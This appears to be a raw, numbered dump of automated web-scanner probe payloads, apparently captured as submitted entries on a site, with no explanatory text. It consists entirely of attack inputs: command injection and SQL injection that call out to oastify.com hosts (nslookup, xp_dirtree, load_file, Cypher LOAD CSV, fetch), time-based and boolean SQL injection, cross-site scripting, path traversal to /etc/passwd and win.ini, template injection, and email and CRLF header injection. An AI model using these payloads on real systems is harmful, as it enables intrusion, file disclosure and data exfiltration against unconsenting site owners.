  1638. ‘”`0&nslookup -q=cname lshmbuzb7sqs5ad5uiilgddlico5cv0sokbazz.oastify.com.&`’


  1639. &nslookup -q=cname urpva3yk61p14jcetrhufmcuhlneb4zznrahy6.oastify.com.&’\”`0&nslookup -q=cname urpva3yk61p14jcetrhufmcuhlneb4zznrahy6.oastify.com.&`’


  1640. |echo maimb44o6o 460u4uaigs||a #’ |echo maimb44o6o 460u4uaigs||a #|” |echo maimb44o6o 460u4uaigs||a #


  1641. &echo dsw718jf6s h4kvoljk7g&


  1642. “|echo 5clksftpa5 a8qoci9hfq ||


  1643. ‘|echo fwus7nzw0h 8v0riby7jl #xzwx


  1644. kbpmmsxugz)(objectClass=*


  1645. 827oojrgj5)(!(objectClass=*)


  1646. kig739hpfi)(!(!(objectClass=*))


  1647. oznrwtobwr)(!(!(!(objectClass=*)))


  1649. ‘+(function(){if(typeof e90ta===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);e90ta=1;}}())+'


  1650. “–>’–>`–>


  1651. BCC:rrmsa0yh6ypy4gcbtohrfjcrhinbb1ztshk4asz@oastify.com
    voi: v


  1652. >
    BCC:t4yun2bjj020hipd6qutslptuk0do3cv6jy6oud@oastify.com
    eqv: i


  1653. (select extractvalue(xmltype(‘<!DOCTYPE root [ %jmpdh;]>’),’/l’) from dual)


  1654. WvEMlU’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jmpdh;]>’),’/l’) from dual)||’


  1655. WvEMlU;declare @q varchar(99);set @q=’\\pg9qzynfvwewte19im6p4h1p6gc900xooec6zwnl.oasti’+’fy.com\tmp’; exec master.dbo.xp_dirtree @q;–


  1656. WvEMlU’;declare @q varchar(99);set @q=’\\qxrrgz4gcxvxafiaznnqliiqnhtah1ep5gt8gy4n.oasti’+’fy.com\doa’; exec master.dbo.xp_dirtree @q;–


  1657. WvEMlU);declare @q varchar(99);set @q=’\\mi8n1vpcxtgtvb36kj8m6e3m8de62xzlqde51vpk.oasti’+’fy.com\imf’; exec master.dbo.xp_dirtree @q;–


  1658. WvEMlU’);declare @q varchar(99);set @q=’\\jsfkbsz97qqq58d3ugijgbdjiao3cu9i0bo3btzi.oasti’+’fy.com\euc’; exec master.dbo.xp_dirtree @q;–


  1659. (select load_file(‘\\\\jaxktsh9pq8qn8v3cg0jybvj0a63uuriik6ct2hr.oastify.com\\bnf’))


  1660. WvEMlU’+(select load_file(‘\\\\2lo34bss09j9yr6mnzb29u62bthm5d21t4hw4msb.oastify.com\\gxs’))+’


  1663. WvEMlU'(select*from(select(sleep(20)))a)’


  1664. WvEMlU+(select*from(select(sleep(20)))a)+


  1665. WvEMlU’+(select*from(select(sleep(20)))a)+’


  1666. WvEMlU and (select*from(select(sleep(20)))a)–


  1667. WvEMlU’ and (select*from(select(sleep(20)))a)–


  1668. WvEMlU,(select*from(select(sleep(20)))a)


  1670. WvEMlU’ waitfor delay’0:0:20′–


  1672. WvEMlU’)waitfor delay’0:0:20′–


  1673. WvEMlU,0)waitfor delay’0:0:20′–


  1674. WvEMlU’,0)waitfor delay’0:0:20′–


  1685. WvEMlU31077209′ or ‘8802’=’8802


  1686. WvEMlU52446632′ or ‘1023’=’1029


  1687. WvEMlU26883903′ or ‘2633’=’2633


  1688. WvEMlU30135233′ or ‘3225’=’3225′


  1707. WvEMlUjrydh%3cscript%3ealert%281%29%3c%2fscript%3eio1mw


  1709. WvEMlUd9z60%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3efadpv


  1728. WvEMlU’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’


  1729. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  1740. f3jgmoa5im1mg4oz5ctfr7oft6zznqkec24pudj.oastify.com


  1742. nslookup -q=cname tifu12pjx0g0vi3dkq8t6l3t8ked24zssvgn3dr2.oastify.com.&


  1743. WvEMlU|nslookup -q=cname mxnngv4cctvtabi6zjnmleimndt6hxela92wskh.oastify.com.&


  1744. WvEMlU'”`0&nslookup -q=cname ct9dcl028jrj61ewv9jch4ecj3pwdnab7zzmpae.oastify.com.&`’


  1745. WvEMlU&nslookup -q=cname r3vsm0ahiy1yggob5otrrjortizbn2kqfe71xpm.oastify.com.&’\”`0&nslookup -q=cname r3vsm0ahiy1yggob5otrrjortizbn2kqfe71xpm.oastify.com.&`’


  1746. WvEMlU|echo fo9ii5u6jy qt6i2vpluc||a #’ |echo fo9ii5u6jy qt6i2vpluc||a #|” |echo fo9ii5u6jy qt6i2vpluc||a #


  1748. WvEMlU”|echo 6lfdnzq55l 92h2p036nz ||


  1749. WvEMlU’|echo 5ub5ctc86w xcfqqqlq3q #xzwx


  1750. WvEMlU|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  1755. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  1757. ../../../../../../../../../../../../../../../../windows/win.ini


  1758. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  1759. ../../../../../../../../../../../../../../../../winnt/win.ini


  1762. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  1763. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  1764. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  1766. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  1767. WvEMlU..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  1768. WvEMlU../../../../../../../../../../../../../../../../windows/win.ini


  1769. WvEMlU..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  1770. WvEMlU../../../../../../../../../../../../../../../../winnt/win.ini


  1771. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniWvEMlU


  1773. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniWvEMlU


  1774. ../../../../../../../../../../../../../../../../etc/passwd


  1777. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  1779. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  1780. WvEMlU../../../../../../../../../../../../../../../../etc/passwd


  1781. ../../../../../../../../../../../../../../../../etc/passwdWvEMlU


  1805. WvEMlU’+(function(){if(typeof n0090===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);n0090=1;}}())+'


  1807. WvEMlU
    BCC:p3tqmyafiw1wgeo95mtprhoptgz9n0koch09nzbo@oastify.com
    gry: e


  1808. WvEMlU>
    BCC:rc7sv0jhryaypgxbeo2r0jxr2i8bw2tqlk9cw2kr@oastify.com
    iyc: v


  2008. knbl6tua2rlr0984phdkbc8kdbj47uvmnafx5lu


  2009. q6xrpzdglx4xjfra8nwquirqwh2aq1npfh39qzeo


  2012. (select extractvalue(xmltype(‘<!DOCTYPE root [ %cdkgo;]>’),’/l’) from dual)


  2013. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %cdkgo;]>’),’/l’) from dual)||’


  2014. ‘;declare @q varchar(99);set @q=’\\ahvvu23kqevx42azmvpb2qk1rsxllb920qsdi17.oasti’+’fy.com\kzt’; exec master.dbo.xp_dirtree @q;–


  2015. (select load_file(‘\\\\m3q7gepwcqh9qewb87bno26dd4jx7nvex2ppfd4.oastify.com\\fot’))


  2016. ‘+(select load_file(‘\\\\525qfxofb9gspxvu7qa6nl5wcnig66uxxlp8fw4.oastify.com\\tft’))+’


  2017. 94554098′ or ‘2354’=’2354


  2018. 96172137′ or ‘9224’=’9233


  2019. 30622739′ or ‘1371’=’1371


  2020. 57084735′ or ‘9708’=’9708′


  2021. 96698819′ or 3172=3172–


  2022. 89357023′ or 1860=1862–


  2023. 76888726′ or 3464=3464–


  2024. 81802476′ or 6150=6150′–


  2025. n464b33z82


  2026. }}murht’/”<jocce


  2027. %}m8d28’/”<bklkz


  2028. rwwc7%>m5hgh’/”<mxn24


  2029. j0k4dbmt9ne6nbt8548klz3aa1gu4kscg43urj.oastify.com


  2031. &nslookup -q=cname v51ginr5ezjisnykagdwqb8mfdl69wxrlj89wy.oastify.com.&’\”`0&nslookup -q=cname v51ginr5ezjisnykagdwqb8mfdl69wxrlj89wy.oastify.com.&`’


  2032. |echo m9oqdyz28x 2iclpzm0v8||a #’ |echo m9oqdyz28x 2iclpzm0v8||a #|” |echo m9oqdyz28x 2iclpzm0v8||a #


  2035. ]]>><


  2036. ‘+(function(){if(typeof vjevj===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);vjevj=1;}}())+'


  2037. “–>’–>`–>


  2038. BCC:nne80f9xwr1aafgcs8vo83qex53yrofg840rqff@oastify.com
    chf: r


  2039. >
    BCC:rrmc4jd10v5eejkgwczsc7ui1972vsjkd85vvjk@oastify.com
    fcb: z


  2040. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2041. zifx98r0`z’z”${{%{{\


  2042. ydis4i6dv0\z`z’z”${{%{{\


  2043. xlevm2p4y0


  2044. ” LOAD CSV FROM ‘https://QZqz3q6H.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z) WHERE “3”=”3


  2045. “})LOAD CSV FROM ‘https://oE4tiqjM.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z{w:”3


  2046. LOAD CSV FROM ‘https://VfiAh20A.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  2047. })LOAD CSV FROM ‘https://xU26aekZ.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  2048. ‘})LOAD CSV FROM ‘https://KUAli5Kn.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z{w:’3


  2049. LOAD CSV FROM ‘https://KFSl222A.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl


  2050. })LOAD CSV FROM ‘https://kIdznBp3.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl


  2051. ‘ LOAD CSV FROM ‘https://cuQ5v0f5.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  2052. ‘})LOAD CSV FROM ‘https://C379qFrq.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  2053. ” LOAD CSV FROM ‘https://wN8AmGYl.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  2054. “})LOAD CSV FROM ‘https://2ySrPv3W.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl//


  2055. ‘ LOAD CSV FROM ‘https://ToGtjxIA.kqeqby9hnii1qaaagfqxmxjtkkqaez.oastify.com’ as yl MATCH(:Z) WHERE ‘3’=’3


  2056. {!xmlparser v=’‘}


  2057. fetch(‘https://p0q3odz70kq5zcrkd3mmakp72y8owd.oastify.com’)


  2059. 39102825′ or ‘1804’=’1804


  2060. 35016992′ or ‘5387’=’5394


  2061. 81018983′ or ‘4059’=’4059


  2062. 58395958′ or ‘5950’=’5950′


  2063. 67352234′ or 5491=5491–


  2064. 34576219′ or 7596=7603–


  2065. 77412495′ or 2335=2335–


  2066. 11766996′ or 7896=7896′–


  2067. mmj053wco6


  2068. document.location=1


  2070. l6phbdocument.location=1klhpe


  2071. l6phbdocument.location=1klhpe


  2072. l6phb%3cscript%3edocument%2elocation%3d1%3c%2fscript%3eklhpe


  2073. l6phbdocument.location=1klhpe


  2074. r1vmrdocument.location=1z24o4


  2075. r1vmrdocument.location=1z24o4


  2076. r1vmr%3cScRiPt%3edocument%2elocation%3d1%3c%2fScRiPt%3ez24o4


  2077. r1vmrdocument.location=1z24o4


  2080. x7mlv%3ca%20b%3dc%3epzhv0


  2082. lrl89${125*400}sjf30


  2083. mp86i{{939*189}}ntbx6


  2084. np7a8#{218*433}tt07w


  2085. ktp7b[[274*163]]j16s5


  2086. o9y2a${file.separator}dy953


  2087. jsl7m%{277*266}ce9pw


  2088. swgdz{{933|add:544}}dpmm4


  2089. #set ($a=513*551) hi99h${a}tkt30


  2090. dz47al5y8w


  2091. ztqu4
    = 949*339


  2092. igsdq{{.}}b79ea{{..}}ijx3o


  2093. czpvx__${696*472}__p0n7r


  2094. }}l6n4u’/”<r5qct


  2095. %}yhtn0’/”<z24yf


  2096. hn226%>u1oca’/”<zl3wp


  2097. yztp8nm3bjrraxtjqvnc


  2098. f0mut0ogwt%41l9wgtj1s9s


  2099. 1utu64gena\\lfppbr7fw4


  2100. 5acozrv7hfAoq0o5to4u1


  2101. 5acozrv7hfAoq0o5to4u1


  2102. |echo v9qwv20s8z 6xyi64h5wb||a #’ |echo v9qwv20s8z 6xyi64h5wb||a #|” |echo v9qwv20s8z 6xyi64h5wb||a #


  2103. ]]>><


  2104. ‘+(function(){if(typeof m032v===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);m032v=1;}}())+'


  2105. “–>’–>`–>


  2106. xz340fku197d08zbd7wrtqv


  2107. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2108. rgpvw4`z’z”${{%{{\


  2109. jofs76fht8\z`z’z”${{%{{\


  2110. wor67e3


  2113. RHKqtL'(select*from(select(sleep(20)))a)’


  2114. RHKqtL+(select*from(select(sleep(20)))a)+


  2115. RHKqtL’+(select*from(select(sleep(20)))a)+’


  2117. RHKqtL’ waitfor delay’0:0:20′–


  2119. RHKqtL’)waitfor delay’0:0:20′–


  2126. RHKqtL45378435′ or ‘6224’=’6224


  2127. RHKqtL18366831′ or ‘1216’=’1225


  2128. RHKqtL71497648′ or ‘2253’=’2253


  2129. RHKqtL71634894′ or ‘8571’=’8571′


  2141. RHKqtLltejb%3cscript%3ealert%281%29%3c%2fscript%3et28hj


  2145. RHKqtLe9hcb%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3elrodu


  2166. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  2178. RHKqtL|echo 7z5bulzz07 v4qldguiin||a #’ |echo 7z5bulzz07 v4qldguiin||a #|” |echo 7z5bulzz07 v4qldguiin||a #


  2179. RHKqtL|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  2180. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  2182. ../../../../../../../../../../../../../../../../windows/win.ini


  2183. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  2184. ../../../../../../../../../../../../../../../../winnt/win.ini


  2187. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  2188. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  2189. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  2191. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  2192. RHKqtL..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  2193. RHKqtL../../../../../../../../../../../../../../../../windows/win.ini


  2194. RHKqtL..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  2195. RHKqtL../../../../../../../../../../../../../../../../winnt/win.ini


  2196. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniRHKqtL


  2198. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniRHKqtL


  2199. ../../../../../../../../../../../../../../../../etc/passwd


  2202. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  2204. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  2205. RHKqtL../../../../../../../../../../../../../../../../etc/passwd


  2206. ../../../../../../../../../../../../../../../../etc/passwdRHKqtL


  2224. RHKqtL’+(function(){if(typeof c0gd0===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);c0gd0=1;}}())+'


  2227. RHKqtL$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2228. RHKqtL%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  2229. RHKqtL|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  2242. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  2243. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  2244. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  2247. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  2255. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  2271. %E5%98%8A%E5%98%8DX-Injection:%20test


  2315. 51578308′ or ‘1141’=’1141


  2316. 77081143′ or ‘8981’=’8985


  2318. 84308023′ or ‘9117’=’9117


  2320. 25363983′ or ‘3960’=’3960′


  2321. NNILzh'(select*from(select(sleep(20)))a)’


  2322. NNILzh+(select*from(select(sleep(20)))a)+


  2323. NNILzh’+(select*from(select(sleep(20)))a)+’


  2324. 13486538′ or 4626=4626–


  2326. NNILzh’ waitfor delay’0:0:20′–


  2328. 34257815′ or 3284=3292–


  2329. NNILzh’)waitfor delay’0:0:20′–


  2332. 43024737′ or 7119=7119–


  2336. 35508152′ or 7375=7375′–


  2338. NNILzh84951687′ or ‘8913’=’8913


  2339. NNILzh93981737′ or ‘4732’=’4740


  2340. 9tn6dfyr6t


  2341. NNILzh86606603′ or ‘6457’=’6457


  2342. NNILzh81042792′ or ‘5485’=’5485′


  2344. document%2elocation%3d1


  2348. amzu6document.location=1mfaol


  2350. amzu6document.location=1mfaol


  2352. amzu6%3cscript%3edocument%2elocation%3d1%3c%2fscript%3emfaol


  2354. amzu6document.location=1mfaol


  2355. sfddodocument.location=1dcl79


  2357. sfddodocument.location=1dcl79


  2359. sfddo%3cScRiPt%3edocument%2elocation%3d1%3c%2fScRiPt%3edcl79


  2362. sfddodocument.location=1dcl79


  2366. NNILzhfnh3s%3cscript%3ealert%281%29%3c%2fscript%3eckv4e


  2367. cqak9%3ca%20b%3dc%3efkpzg


  2372. bavo2${117*601}ny87h


  2373. NNILzhye0g0%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3efdf5k


  2374. hjtgs{{418*977}}yrfa7


  2376. ny0jp#{832*406}e6r15


  2378. jkq73[[880*796]]z11op


  2380. qccgm${file.separator}e50vw


  2382. tp07e%{189*466}bkktw


  2384. bh74t{{542|add:808}}bdp4b


  2385. #set ($a=990*242) p7cdj${a}fdgiu


  2387. nfzdcupm1b


  2389. m3rdv
    = 956*249


  2392. p7amt{{.}}tcx1l{{..}}logo1


  2394. g7f8v__${580*351}__yav65


  2396. }}sjaqq’/”<nww7i


  2398. %}uog6q’/”<y4vmj


  2400. jfkyx%>b7mys’/”<muv4j


  2402. 7dagxs5ycudjrndtsj8s


  2404. io03llrgpe%41oryyzamcog


  2406. pywohsi73j\\lnf1xz139d


  2409. bgo76p8d1mAxrvmr74v1e


  2411. bgo76p8d1mAxrvmr74v1e


  2413. |echo v5as9j1qfx 22t32htn1h||a #’ |echo v5as9j1qfx 22t32htn1h||a #|” |echo v5as9j1qfx 22t32htn1h||a #


  2414. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  2421. NNILzh|echo ulk7989eo0 s7wevbeepv||a #’ |echo ulk7989eo0 s7wevbeepv||a #|” |echo ulk7989eo0 s7wevbeepv||a #


  2422. NNILzh|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  2423. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  2425. ../../../../../../../../../../../../../../../../windows/win.ini


  2426. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  2427. ../../../../../../../../../../../../../../../../winnt/win.ini


  2430. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  2431. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  2432. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  2434. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  2435. ]]>><


  2436. NNILzh..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  2437. NNILzh../../../../../../../../../../../../../../../../windows/win.ini


  2438. ‘+(function(){if(typeof pj0eq===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);pj0eq=1;}}())+'


  2439. NNILzh..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  2440. NNILzh../../../../../../../../../../../../../../../../winnt/win.ini


  2441. “–>’–>`–>


  2442. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniNNILzh


  2444. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniNNILzh


  2445. ../../../../../../../../../../../../../../../../etc/passwd


  2446. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2448. k1x0i56`z’z”${{%{{\


  2450. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  2451. ixejg1\z`z’z”${{%{{\


  2453. wnvr3


  2454. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  2455. NNILzh../../../../../../../../../../../../../../../../etc/passwd


  2456. ../../../../../../../../../../../../../../../../etc/passwdNNILzh


  2474. NNILzh’+(function(){if(typeof hw1u6===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);hw1u6=1;}}())+'


  2477. NNILzh$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2478. NNILzh%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  2479. NNILzh|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  2492. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  2493. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  2494. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  2497. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  2505. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  2521. %E5%98%8A%E5%98%8DX-Injection:%20test


  2549. 44563958′ or ‘5229’=’5229


  2551. 31449372′ or ‘8488’=’8489


  2553. PjctNs'(select*from(select(sleep(20)))a)’


  2554. 62325861′ or ‘7644’=’7644


  2555. PjctNs+(select*from(select(sleep(20)))a)+


  2556. PjctNs’+(select*from(select(sleep(20)))a)+’


  2558. 36348906′ or ‘2929’=’2929′


  2559. PjctNs’ waitfor delay’0:0:20′–


  2561. PjctNs’)waitfor delay’0:0:20′–


  2562. 71713847′ or 8947=8947–


  2566. 69008820′ or 8498=8502–


  2570. 98524674′ or 6786=6786–


  2571. PjctNs85087430′ or ‘5779’=’5779


  2572. PjctNs84478185′ or ‘5572’=’5577


  2573. 82874417′ or 9934=9934′–


  2574. PjctNs63244281′ or ‘4950’=’4950


  2575. wlph74pdwx


  2576. PjctNs34726644′ or ‘9656’=’9656′


  2579. document.title=1


  2582. ylabgdocument.title=1zvkqm


  2584. ylabgdocument.title=1zvkqm


  2586. ylabg%3cscript%3edocument%2etitle%3d1%3c%2fscript%3ezvkqm


  2588. ylabgdocument.title=1zvkqm


  2590. d76midocument.title=1m19bd


  2592. d76midocument.title=1m19bd


  2595. d76mi%3cScRiPt%3edocument%2etitle%3d1%3c%2fScRiPt%3em19bd


  2597. d76midocument.title=1m19bd


  2598. PjctNsrx7ae%3cscript%3ealert%281%29%3c%2fscript%3euqp2l


  2603. rkty4%3ca%20b%3dc%3errahi


  2606. PjctNsxi2u0%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3ewul8s


  2607. g0g3p${346*367}l8lev


  2609. icmqk{{929*338}}qlh2d


  2612. lybvp#{261*707}qwj9o


  2614. qag40[[289*306]]icq1y


  2616. fz1x9${file.separator}uvzar


  2619. xmen5%{537*605}jlgkg


  2621. kyaex{{343|add:510}}xcplk


  2623. #set ($a=137*545) ks22y${a}jvl4v


  2625. lon83l50v8


  2627. sd119
    = 104*112


  2629. cv88c{{.}}awgee{{..}}v3mi9


  2631. n8q2l__${447*204}__d80dg


  2633. }}jocxi’/”<pbw9m


  2635. %}v1n87’/”<ca8wm


  2637. cmdk3%>y8q7n’/”<zmuqz


  2639. sn2m9lqugj82ubjwyesm


  2641. ki0nwnph8v%41zz52u94k2v


  2643. 41yd7mtm95\\l3j5id7hqx


  2644. ptfk6n9uhcAxki3qv68k2


  2646. ptfk6n9uhcAxki3qv68k2


  2647. eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))


  2649. |echo llg60enioi eq98nsxwkq||a #’ |echo llg60enioi eq98nsxwkq||a #|” |echo llg60enioi eq98nsxwkq||a #


  2652. ]]>><


  2653. ‘+(function(){if(typeof qy00p===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);qy00p=1;}}())+'


  2654. “–>’–>`–>


  2657. $zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2658. jk4e1`z’z”${{%{{\


  2660. wbmf0vo0zz1\z`z’z”${{%{{\


  2661. k45z0s4


  2667. PjctNs|echo gllafykk81 374kqu1jj0||a #’ |echo gllafykk81 374kqu1jj0||a #|” |echo gllafykk81 374kqu1jj0||a #


  2668. PjctNs|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1


  2669. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  2671. ../../../../../../../../../../../../../../../../windows/win.ini


  2672. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  2673. ../../../../../../../../../../../../../../../../winnt/win.ini


  2676. …\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini


  2677. …/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini


  2678. …\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini


  2680. %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini


  2681. PjctNs..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini


  2682. PjctNs../../../../../../../../../../../../../../../../windows/win.ini


  2683. PjctNs..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini


  2684. PjctNs../../../../../../../../../../../../../../../../winnt/win.ini


  2685. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniPjctNs


  2687. ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniPjctNs


  2688. ../../../../../../../../../../../../../../../../etc/passwd


  2691. …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd


  2693. %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd


  2694. PjctNs../../../../../../../../../../../../../../../../etc/passwd


  2695. ../../../../../../../../../../../../../../../../etc/passwdPjctNs


  2713. PjctNs’+(function(){if(typeof k3eb7===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);k3eb7=1;}}())+'


  2716. PjctNs$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d


  2717. PjctNs%26zq=x%3c%61%60%27%22%24%7b%7b%5c


  2718. PjctNs|zqy=x%3c%61%60%27%22%24%7b%7b%5c


  2731. …/….///…/….///…/….///…/….///…/….///…/….///etc/passwd


  2732. …/…//…/…//…/…//…/…//…/…//…/…//…/…//…/…//etc/passwd


  2733. ../../../../../../../../../../../../../../../../etc/passwd%00.html


  2736. ../../../../../../../../../../../../../../../../windows/win.ini%00.html


  2744. %c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml


  2760. %E5%98%8A%E5%98%8DX-Injection:%20test


  2837. 71650378′ or ‘4630’=’4630


  2838. 14769657′ or ‘5261’=’5262


  2839. 75355713′ or ‘1700’=’1700


  2840. 19465542′ or ‘9072’=’9072′


  2841. 66870937′ or 4435=4435–


  2842. 93964075′ or 2184=2191–


  2843. 47554441′ or 8862=8862–


  2844. 17124814′ or 6951=6951′–


  2845. z5fknvvimo


  2846. document%2etitle%3d1


  2848. ia1rddocument.title=1bun39


  2849. ia1rddocument.title=1bun39


  2850. ia1rd%3cscript%3edocument%2etitle%3d1%3c%2fscript%3ebun39


